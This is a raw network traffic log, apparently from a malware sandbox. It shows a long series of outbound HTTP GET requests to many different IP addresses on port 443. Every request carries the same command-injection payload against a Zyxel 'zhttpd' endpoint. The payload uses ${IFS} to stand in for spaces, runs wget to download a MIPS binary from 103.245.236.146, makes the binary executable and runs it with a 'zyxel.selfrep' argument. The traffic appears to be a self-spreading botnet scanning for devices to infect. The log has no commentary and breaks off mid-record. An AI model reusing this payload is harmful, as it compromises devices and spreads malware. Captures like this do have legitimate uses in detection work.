                                                Jan 28, 2024 10:16:14.638777018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1615192.168.2.2353652111.135.38.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638803959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1616192.168.2.2359866201.142.138.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638842106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1617192.168.2.2336920156.54.132.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638864040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1618192.168.2.2349890126.87.59.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638912916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1619192.168.2.2348620148.54.206.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638953924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1620192.168.2.235336643.63.159.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638984919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1621192.168.2.2359316220.68.121.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.638993025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1622192.168.2.2350920206.182.165.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639024973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1623192.168.2.2352696149.39.77.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639043093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1624192.168.2.2360318177.94.183.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639081001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1625192.168.2.234586043.187.176.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639084101 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1626192.168.2.2339634119.219.104.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639138937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1627192.168.2.23600329.184.216.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639164925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1628192.168.2.235008032.29.181.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639178991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1629192.168.2.2338308112.201.59.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639189005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1630192.168.2.236042045.157.5.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639216900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1631192.168.2.233926272.76.208.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639239073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1632192.168.2.2344272180.71.201.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639281034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1633192.168.2.2354164217.18.87.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639285088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1634192.168.2.2346596164.101.156.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639312983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1635192.168.2.2344672141.112.7.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639333963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1636192.168.2.235151861.178.84.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639336109 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1637192.168.2.235323290.64.228.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639575005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1638192.168.2.2359414104.180.152.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639592886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1639192.168.2.2350158132.88.1.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639627934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1640192.168.2.2360926113.242.158.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639653921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1641192.168.2.234795623.207.41.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639691114 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1642192.168.2.2355888179.25.191.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639717102 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1643192.168.2.2357618119.167.171.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639718056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1644192.168.2.236009260.220.249.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639735937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1645192.168.2.2352954189.231.31.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639754057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1646192.168.2.2340618193.193.150.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639774084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1647192.168.2.2337700123.64.160.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639789104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1648192.168.2.2345550150.118.23.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639828920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1649192.168.2.2343736159.17.2.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639856100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1650192.168.2.2341642147.25.43.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639883041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1651192.168.2.233831213.105.49.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639894009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1652192.168.2.234359465.54.29.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639918089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1653192.168.2.2351190144.134.64.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639956951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1654192.168.2.2341960108.84.156.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.639991999 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1655192.168.2.236066462.115.146.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640007019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1656192.168.2.2337110119.79.201.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640057087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1657192.168.2.235022066.230.117.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640058041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1658192.168.2.236025446.147.51.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640099049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1659192.168.2.234304652.151.73.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640135050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1660192.168.2.2345642209.115.40.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640162945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1661192.168.2.2355374111.232.37.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640187979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1662192.168.2.2360734151.124.78.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640208960 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1663192.168.2.2355932198.111.193.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640239000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1664192.168.2.2354244116.248.175.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640239954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1665192.168.2.235324431.61.40.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640275955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1666192.168.2.2344980159.6.182.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640316963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1667192.168.2.234643076.135.237.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640347004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1668192.168.2.233935060.247.201.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640379906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1669192.168.2.233326260.146.6.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640393972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1670192.168.2.2358288102.18.250.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640438080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1671192.168.2.234883644.185.2.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640475035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1672192.168.2.235976281.155.129.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640496016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1673192.168.2.2343462123.67.179.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640511036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1674192.168.2.2347198165.138.194.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640537977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1675192.168.2.234166688.102.208.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:14.640558004 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                1676192.168.2.2346926120.111.35.255443
                                                TimestampBytes transferredDirectionData
